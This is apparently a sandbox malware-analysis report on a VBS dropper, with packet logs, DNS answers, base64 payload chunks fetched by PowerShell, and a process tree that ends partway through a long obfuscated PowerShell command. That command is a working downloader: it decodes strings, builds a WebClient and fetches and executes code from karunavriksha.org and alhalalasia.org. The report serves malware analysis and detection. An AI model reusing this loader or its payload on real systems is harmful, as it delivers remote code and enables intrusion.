                                    Apr 8, 2025 08:12:31.371779919 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371797085 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371798038 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371809006 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371839046 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371872902 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371876955 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371884108 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371908903 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371939898 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371939898 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371952057 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371956110 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371973038 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371975899 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.372004986 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.372011900 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.372028112 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.372143984 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.372163057 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.394969940 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.394999027 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.395054102 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.395065069 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.395092010 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.395102024 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.395121098 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.395159960 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.398516893 CEST49683443192.168.2.9146.88.26.238
                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 8, 2025 08:12:27.396853924 CEST6357653192.168.2.91.1.1.1
                                    Apr 8, 2025 08:12:28.337133884 CEST53635761.1.1.1192.168.2.9

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Apr 8, 2025 08:12:27.396853924 CEST192.168.2.91.1.1.10x34e9Standard query (0)karunavriksha.orgA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Apr 8, 2025 08:12:28.337133884 CEST1.1.1.1192.168.2.90x34e9No error (0)karunavriksha.org146.88.26.238A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • karunavriksha.org

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.949683146.88.26.2384436560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2025-04-08 06:12:29 UTC181OUTGET /images/innocence.mso HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                    Host: karunavriksha.org
                                    Connection: Keep-Alive
                                    2025-04-08 06:12:29 UTC250INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Tue, 08 Apr 2025 06:12:29 GMT
                                    Content-Length: 643188
                                    Connection: close
                                    Strict-Transport-Security: max-age=300; includeSubDomains; preload
                                    Last-Modified: Mon, 07 Apr 2025 00:21:47 GMT
                                    Accept-Ranges: bytes
                                    2025-04-08 06:12:29 UTC16134INData Raw: 5a 6f 50 71 41 4c 75 2b 66 42 77 41 32 64 41 44 58 43 51 45 6d 37 6b 2f 53 56 52 58 67 65 6b 4e 6e 46 39 50 67 66 45 79 72 66 51 48 67 2f 4d 41 75 6f 31 68 53 34 72 5a 30 47 59 68 77 44 48 4b 49 4d 6d 4a 46 41 75 44 77 77 44 52 34 6d 61 44 38 77 43 44 77 51 54 5a 30 49 48 35 41 6d 62 54 41 33 7a 67 69 30 51 6b 42 47 59 68 77 49 6e 44 5a 6f 50 4a 41 49 48 44 79 50 7a 78 41 49 48 37 36 42 54 4c 5a 37 71 53 76 79 37 75 67 66 49 6e 6f 66 57 38 67 66 4b 31 48 74 74 53 5a 6f 50 48 41 43 44 53 69 77 77 51 67 4d 6b 41 69 51 77 54 5a 73 48 76 41 45 49 68 79 59 48 36 73 4f 49 47 41 48 58 6d 77 65 4d 41 69 56 77 6b 44 50 79 42 37 51 41 44 41 41 43 44 79 67 43 4c 56 43 51 49 67 50 45 41 69 33 77 6b 42 49 50 72 41 49 6e 72 77 4f 73 41 67 63 4f 63 41 41 41 41 49 4d 42
                                    Data Ascii: ZoPqALu+fBwA2dADXCQEm7k/SVRXgekNnF9PgfEyrfQHg/MAuo1hS4rZ0GYhwDHKIMmJFAuDwwDR4maD8wCDwQTZ0IH5AmbTA3zgi0QkBGYhwInDZoPJAIHDyPzxAIH76BTLZ7qSvy7ugfInofW8gfK1HttSZoPHACDSiwwQgMkAiQwTZsHvAEIhyYH6sOIGAHXmweMAiVwkDPyB7QADAACDygCLVCQIgPEAi3wkBIPrAInrwOsAgcOcAAAAIMB
                                    2025-04-08 06:12:29 UTC16384INData Raw: 74 58 59 76 66 74 49 47 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 76 43 53 51 4d 77 57 65 5a 39 78 2b 32 74 48 70 51 6d 68 51 75 57 55 57 32 35 6e 6e 4d 2f 69 71 30 63 74 50 41 47 6c 75 7a 43 44 6c 72 49 6d 77 57 5a 37 4d 4b 66 67 64 39 50 76 56 67 65 78 77 37 57 6e 32 4f 55 6d 58 6e 6f 44 4e 35 58 75 71 6d 35 6b 6f 63 70 6b 75 41 41 58 32 67 47 38 77 45 38 74 38 63 4d 2b 55 71 6a 5a 6a 4d 6b 65 64 52 2f 33 75 4e 79 44 2f 64 61 51 62 62 56 69 6f 45 48 31 55 73 30 55 73 75 72 41 4c 56 59 52 41 38 74 2f 71 73 41 74 55 42 79 68 6b 2b 4a 56 74 51 68 6a 68 30 57 69 77 74 68 42 62 49 38 72 46 4b 32 5a 44 46 47 62 37 31 42 31 4e 64 75 4b 4a 6e 4d 7a 74 74 57 52 38 49 68 37 74 2b 70 6a
                                    Data Ascii: tXYvftIG0w21dtMNtXbTDbV20w21dtMNtXbTDbV20w21dtMNvCSQMwWeZ9x+2tHpQmhQuWUW25nnM/iq0ctPAGluzCDlrImwWZ7MKfgd9PvVgexw7Wn2OUmXnoDN5Xuqm5kocpkuAAX2gG8wE8t8cM+UqjZjMkedR/3uNyD/daQbbVioEH1Us0UsurALVYRA8t/qsAtUByhk+JVtQhjh0WiwthBbI8rFK2ZDFGb71B1NduKJnMzttWR8Ih7t+pj
                                    2025-04-08 06:12:30 UTC16384INData Raw: 74 58 62 54 44 62 56 32 30 77 54 6d 5a 6f 56 78 35 71 72 39 38 36 6f 6d 4b 30 76 54 52 72 4d 4e 52 58 66 63 2f 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 70 54 49 43 6e 4f 33 6d 42 4e 58 44 54 31 6a 70 41 37 68 52 62 51 31 46 57 4c 47 6d 31 4e 4e 46 55 39 31 58 55 4b 79 46 74 75 45 2f 58 30 6f 4f 4e 74 74 71 43 52 36 6a 72 57 4b 30 79 54 52 72 4d 4f 61 36 33 72 43 6d 57 4f 6b 33 75 46 46 74 44 53 5a 73 77 35 37 55 30 35 46 53 33 56 63 2f 69 6d 37 2f 49 39 75 39 57 49 54 54 57 71 55 46 49 69 68 6e 59 73 30 65 31 6f 66 74 59 75 71 32 37 69 67 41 38 62 6b 38 58 6e 71 74 34 34 59 55 4f 41 59 72 47 70 59 76 76 51 48 6f 36 34 45 59 47 50 42 4f 6e 45 76 6b 4f 65 57 62 58 36 4a 34 5a
                                    Data Ascii: tXbTDbV20wTmZoVx5qr986omK0vTRrMNRXfc/bV20w21dtMNtXbTDbV20w21dtMNtXbTDbV20w21dtpTICnO3mBNXDT1jpA7hRbQ1FWLGm1NNFU91XUKyFtuE/X0oONttqCR6jrWK0yTRrMOa63rCmWOk3uFFtDSZsw57U05FS3Vc/im7/I9u9WITTWqUFIihnYs0e1oftYuq27igA8bk8Xnqt44YUOAYrGpYvvQHo64EYGPBOnEvkOeWbX6J4Z
                                    2025-04-08 06:12:30 UTC16384INData Raw: 6d 71 39 33 63 63 34 44 4f 37 6c 67 75 68 69 63 44 4c 31 67 43 4a 4c 6e 66 33 63 4e 52 37 44 6c 33 39 32 32 67 74 50 70 61 61 6b 2f 58 6b 65 5a 6c 46 6d 6a 6d 48 51 79 56 78 67 38 37 58 47 45 34 77 4e 76 77 31 6b 63 4d 35 37 35 2b 6d 2f 79 79 30 63 4c 68 6e 2f 52 30 59 67 34 35 48 68 72 35 34 63 42 31 6b 59 6a 2f 41 6f 54 65 41 76 4d 56 53 39 4e 6a 4e 75 6d 67 77 4a 4f 4c 78 4d 4e 74 58 6b 75 43 4d 36 43 59 32 65 66 53 30 7a 56 71 67 42 75 42 33 64 41 73 2f 49 5a 2f 73 78 79 61 4b 57 4e 63 43 68 2b 7a 48 33 4a 39 57 56 37 31 59 67 73 4a 53 61 43 33 4d 68 41 75 4e 31 48 64 6f 44 62 6e 64 37 6a 78 72 32 6a 7a 56 77 36 30 54 57 78 51 4a 51 6b 47 6a 6a 51 67 69 52 44 31 74 46 4b 74 39 52 6a 49 2f 32 67 4a 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d
                                    Data Ascii: mq93cc4DO7lguhicDL1gCJLnf3cNR7Dl3922gtPpaak/XkeZlFmjmHQyVxg87XGE4wNvw1kcM575+m/yy0cLhn/R0Yg45Hhr54cB1kYj/AoTeAvMVS9NjNumgwJOLxMNtXkuCM6CY2efS0zVqgBuB3dAs/IZ/sxyaKWNcCh+zH3J9WV71YgsJSaC3MhAuN1HdoDbnd7jxr2jzVw60TWxQJQkGjjQgiRD1tFKt9RjI/2gJtMNtXbTDbV20w21dtM
                                    2025-04-08 06:12:30 UTC16384INData Raw: 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 32 6b 73 37 4e 42 36 61 32 4f 76 57 46 69 35 74 30 47 72 49 2b 35 73 54 4c 67 65 51 48 35 69 5a 69 78 4d 67 63 62 2f 65 39 59 67 4f 70 61 76 73 47 34 69 45 42 69 33 41 33 57 6e 49 77 30 73 32 55 2f 75 70 58 6b 41 53 62 74 39 4a 70 56 46 50 33 58 34 78 37 61 37 4b 58 62 73 67 2b 34 54 76 2b 49 7a 66 67 55 6f 35 34 41 43 53 4f 48 5a 32 66 48 6f 63 77 45 61 49 4b 62 41 6a 48 6c 56 4c 62 62 4e 68 4a 4b 4f 68 4f 30 69 64 62 6e 79 4a 34 6c 59 45 72 76 35 36 44 56 4b 38 50 4e 2b 54 64 36 37 42 42 59 78 30 4e 35 50 37 74 4f 64 57 38 77 32 77 44 53 69 78 70 4d 44 65 6b 75 31 6f 4c 33 75 2b 31 73 71 77 43 30 37 4d 66 36 4a 41 78 75 41 71 72 6b 44 7a 63 4f 53 69 67 48 62 6b 46 66 4f 65 61 71 6e
                                    Data Ascii: tXbTDbV20w21dtMNtXbTDbV22ks7NB6a2OvWFi5t0GrI+5sTLgeQH5iZixMgcb/e9YgOpavsG4iEBi3A3WnIw0s2U/upXkASbt9JpVFP3X4x7a7KXbsg+4Tv+IzfgUo54ACSOHZ2fHocwEaIKbAjHlVLbbNhJKOhO0idbnyJ4lYErv56DVK8PN+Td67BBYx0N5P7tOdW8w2wDSixpMDeku1oL3u+1sqwC07Mf6JAxuAqrkDzcOSigHbkFfOeaqn
                                    2025-04-08 06:12:30 UTC16384INData Raw: 30 5a 64 48 5a 42 33 73 56 6c 67 39 37 34 55 74 6c 58 62 62 6b 5a 42 4e 62 4c 39 5a 42 44 36 53 62 57 6e 71 6e 33 50 51 6e 70 4b 39 61 75 7a 42 62 61 5a 4f 6b 6f 31 6f 61 50 2b 56 56 76 36 54 72 57 6e 71 39 33 62 7a 2f 70 4f 77 62 78 75 54 70 65 64 4b 31 66 6c 42 30 76 30 38 45 59 48 63 79 73 71 57 6f 46 76 4a 46 36 58 33 30 33 7a 77 44 30 68 68 6a 6b 6e 36 6f 63 72 6d 2f 59 75 68 51 6c 44 66 2b 48 7a 4f 70 7a 58 35 77 30 56 75 4b 47 4e 6d 4a 51 77 67 38 79 32 31 64 69 4d 63 31 4d 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 38 4d 69 41 61 73 2f 6e 6d 46 69 55 62 38 43 78 49 2b 61 73 53 6f 36 75 48 36 48 6a 6f 57 78 4b 70 51 35 54 5a 63 78 59 6c 63 2b 31 70 7a 6c 43 46 77 48 37
                                    Data Ascii: 0ZdHZB3sVlg974UtlXbbkZBNbL9ZBD6SbWnqn3PQnpK9auzBbaZOko1oaP+VVv6TrWnq93bz/pOwbxuTpedK1flB0v08EYHcysqWoFvJF6X303zwD0hhjkn6ocrm/YuhQlDf+HzOpzX5w0VuKGNmJQwg8y21diMc1MbTDbV20w21dtMNtXbTDbV20w21dtMNtXbTDbV20w28MiAas/nmFiUb8CxI+asSo6uH6HjoWxKpQ5TZcxYlc+1pzlCFwH7
                                    2025-04-08 06:12:30 UTC16384INData Raw: 6d 59 39 4d 35 2b 4a 46 4c 47 41 42 35 4b 59 49 46 73 44 46 2b 63 6b 50 54 70 77 6a 66 71 38 30 51 41 38 6a 39 64 42 5a 54 4c 48 59 61 42 75 6d 76 58 38 2f 49 55 7a 70 4f 56 71 47 69 62 36 35 4a 77 50 57 72 67 4e 67 4a 33 48 4d 36 30 4b 62 76 51 72 71 2b 4d 79 47 4b 32 57 69 6f 5a 44 79 74 58 62 54 39 57 34 37 54 50 4a 4e 37 51 39 64 70 58 62 59 2f 74 79 37 47 54 76 56 67 4b 2b 65 4b 55 37 4d 66 70 79 37 47 54 57 69 6f 64 38 6c 4a 58 62 54 39 57 36 63 51 31 32 31 67 4b 34 4f 4f 64 62 4d 70 51 36 71 67 78 32 31 65 71 4d 6f 6a 6a 73 46 68 61 4b 68 6b 37 46 56 64 74 50 31 51 6e 74 4d 38 6b 57 4c 6a 76 4c 5a 4d 4e 32 2f 32 59 46 41 4b 58 39 47 49 36 67 73 54 33 6b 34 41 5a 79 41 76 32 41 44 6f 37 4a 4a 6d 64 36 44 73 76 35 79 6a 51 62 6c 66 7a 71 74 51 79 64
                                    Data Ascii: mY9M5+JFLGAB5KYIFsDF+ckPTpwjfq80QA8j9dBZTLHYaBumvX8/IUzpOVqGib65JwPWrgNgJ3HM60KbvQrq+MyGK2WioZDytXbT9W47TPJN7Q9dpXbY/ty7GTvVgK+eKU7Mfpy7GTWiod8lJXbT9W6cQ121gK4OOdbMpQ6qgx21eqMojjsFhaKhk7FVdtP1QntM8kWLjvLZMN2/2YFAKX9GI6gsT3k4AZyAv2ADo7JJmd6Dsv5yjQblfzqtQyd
                                    2025-04-08 06:12:30 UTC16384INData Raw: 4b 32 37 63 31 62 31 68 42 41 2b 4a 31 74 4d 4e 54 59 54 45 72 65 56 36 71 31 41 46 5a 74 4d 43 4f 70 41 48 31 61 4b 68 45 72 53 56 64 74 50 31 61 2b 39 4d 38 6b 69 5a 64 57 34 6f 2f 73 6e 51 42 57 62 54 41 75 71 51 42 39 76 56 69 31 78 35 69 6f 34 4f 76 61 56 32 31 46 4c 42 53 71 4d 79 51 61 62 61 70 61 4b 69 57 57 46 56 64 74 50 31 2f 4e 4c 54 48 62 57 4c 44 64 58 35 33 73 54 5a 4e 2b 71 7a 44 62 57 4f 6d 34 6d 31 5a 74 73 65 6a 78 38 41 66 58 31 35 5a 6d 42 61 7a 73 54 5a 4e 66 56 54 44 62 57 4f 6c 41 6d 31 5a 74 74 43 65 51 36 4b 6e 61 56 32 32 53 58 4c 62 77 73 61 59 6a 6a 51 33 62 56 32 4b 2f 73 76 36 53 7a 77 4b 70 36 50 4d 6a 31 73 43 70 32 6c 64 74 72 31 79 32 38 41 6b 42 57 49 4c 35 57 69 6f 52 47 30 74 58 62 54 39 55 41 76 54 50 4a 4e 65 55 35
                                    Data Ascii: K27c1b1hBA+J1tMNTYTEreV6q1AFZtMCOpAH1aKhErSVdtP1a+9M8kiZdW4o/snQBWbTAuqQB9vVi1x5io4OvaV21FLBSqMyQabapaKiWWFVdtP1/NLTHbWLDdX53sTZN+qzDbWOm4m1Ztsejx8AfX15ZmBazsTZNfVTDbWOlAm1ZttCeQ6KnaV22SXLbwsaYjjQ3bV2K/sv6SzwKp6PMj1sCp2ldtr1y28AkBWIL5WioRG0tXbT9UAvTPJNeU5
                                    2025-04-08 06:12:30 UTC16384INData Raw: 74 58 59 72 53 54 31 35 4c 50 37 70 4c 73 36 37 68 75 70 65 73 34 31 68 42 41 52 6c 31 74 4d 4e 54 59 65 48 72 65 56 36 38 67 32 36 47 73 45 49 33 70 70 42 76 63 37 62 54 4f 57 71 45 4b 37 72 75 6d 39 75 73 35 31 71 75 6b 4f 67 43 74 56 74 53 69 6c 72 45 31 46 62 75 50 30 46 67 4c 37 49 76 4c 35 4e 44 53 5a 2f 42 57 58 70 38 5a 4d 73 48 38 77 52 69 74 43 41 6f 4e 37 61 7a 47 47 62 6e 49 42 55 55 53 58 6e 41 52 38 57 59 62 6c 4e 45 77 43 2f 2b 35 38 5a 6c 64 34 63 33 72 31 41 62 57 6c 4c 74 66 55 41 6c 6f 57 69 6f 52 42 57 35 58 62 54 39 57 30 67 54 50 4a 41 6b 2b 69 37 48 69 37 7a 6f 6f 57 42 50 35 57 71 53 6e 6b 63 68 50 43 7a 2b 6f 67 72 65 78 4d 4a 6b 46 72 67 47 4f 68 4c 45 6f 6b 70 57 48 4d 6f 71 73 73 53 68 41 50 33 55 46 4d 57 4c 63 46 77 48 78 75
                                    Data Ascii: tXYrST15LP7pLs67hupes41hBARl1tMNTYeHreV68g26GsEI3ppBvc7bTOWqEK7rum9us51qukOgCtVtSilrE1FbuP0FgL7IvL5NDSZ/BWXp8ZMsH8wRitCAoN7azGGbnIBUUSXnAR8WYblNEwC/+58Zld4c3r1AbWlLtfUAloWioRBW5XbT9W0gTPJAk+i7Hi7zooWBP5WqSnkchPCz+ogrexMJkFrgGOhLEokpWHMoqssShAP3UFMWLcFwHxu
                                    2025-04-08 06:12:30 UTC16384INData Raw: 32 6e 44 52 55 4a 73 32 54 45 38 4d 7a 6f 6a 79 43 58 69 49 55 65 55 4e 77 62 36 67 47 79 4e 30 44 74 4f 47 6c 51 54 2b 7a 54 4a 4b 68 74 4d 49 33 70 58 47 50 72 41 72 54 4b 57 71 48 2f 2b 7a 6c 41 43 7a 38 6d 67 75 7a 47 54 66 59 4b 42 55 43 4d 6a 72 45 64 6e 4b 70 36 55 34 6d 73 59 6b 66 65 6a 7a 6e 70 79 6c 54 70 71 6c 75 7a 51 34 7a 52 57 4c 72 6f 64 42 39 45 4d 6c 33 76 56 75 4f 77 4f 49 73 56 6b 64 30 6f 70 4b 61 33 53 61 45 56 59 4a 36 47 48 39 75 72 71 4e 73 4c 43 52 4d 4e 36 64 65 46 33 6a 41 6b 4d 33 43 35 4e 4e 74 59 71 67 59 6f 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 45 2b 78 51 6b 55 4a 7a 75 61 76 79 31 74 74 4d 4e 6a 49 62 54 6a 62 56 7a 4d 78 4b 4e 37 67 35
                                    Data Ascii: 2nDRUJs2TE8MzojyCXiIUeUNwb6gGyN0DtOGlQT+zTJKhtMI3pXGPrArTKWqH/+zlACz8mguzGTfYKBUCMjrEdnKp6U4msYkfejznpylTpqluzQ4zRWLrodB9EMl3vVuOwOIsVkd0opKa3SaEVYJ6GH9urqNsLCRMN6deF3jAkM3C5NNtYqgYoV20w21dtMNtXbTDbV20w21dtMNtXbTDbV20w21dtME+xQkUJzuavy1ttMNjIbTjbVzMxKN7g5


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    • File
                                    • Registry

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:02:12:20
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs"
                                    Imagebase:0x7ff65e5f0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    Show Windows behavior

                                    File Activities

                                    Show Windows behavior

                                    Section Activities

                                    Show Windows behavior

                                    Registry Activities

                                    Show Windows behavior

                                    COM Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:1
                                    Start time:02:12:21
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1
                                    Imagebase:0x7ff75cef0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    Show Windows behavior

                                    File Activities

                                    Show Windows behavior

                                    Section Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Process Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:2
                                    Start time:02:12:21
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff74be10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    Show Windows behavior

                                    File Activities

                                    Show Windows behavior

                                    Section Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Mutex Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:3
                                    Start time:02:12:21
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping 127.0.0.1
                                    Imagebase:0x7ff65e550000
                                    File size:22'528 bytes
                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Section Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:4
                                    Start time:02:12:24
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gteaSpartl+ Besvr$Ov,rcoB,eboeleHornhiVI terpB infeeNh.miame');Meyers (Emissionskursers ' Polys$ KlinigKomi elSocio OSukkerbUnder AProvinlBrnefl:CaptaniDrilnin p owhTtypewrEUopf.lrJaz.reoCephusrForsorBK.mseniWoolleTta noiAtrsaltLWarsza=Ginnen$CurrisAA bergUInter.tDelighoReflyig Gynkoi TroldrFintfoOBagee .RekurrsPapirkP.rticaltafle.iTra letHov ds(D,mult$Altsaxb Omsl,lFiggieO Afrakk.letteRmedkmpEJejunagbr dgrImyologsDo.sonTAvsharR .erbrePolychRFangsiI LapniNStr,teg StudeEProj 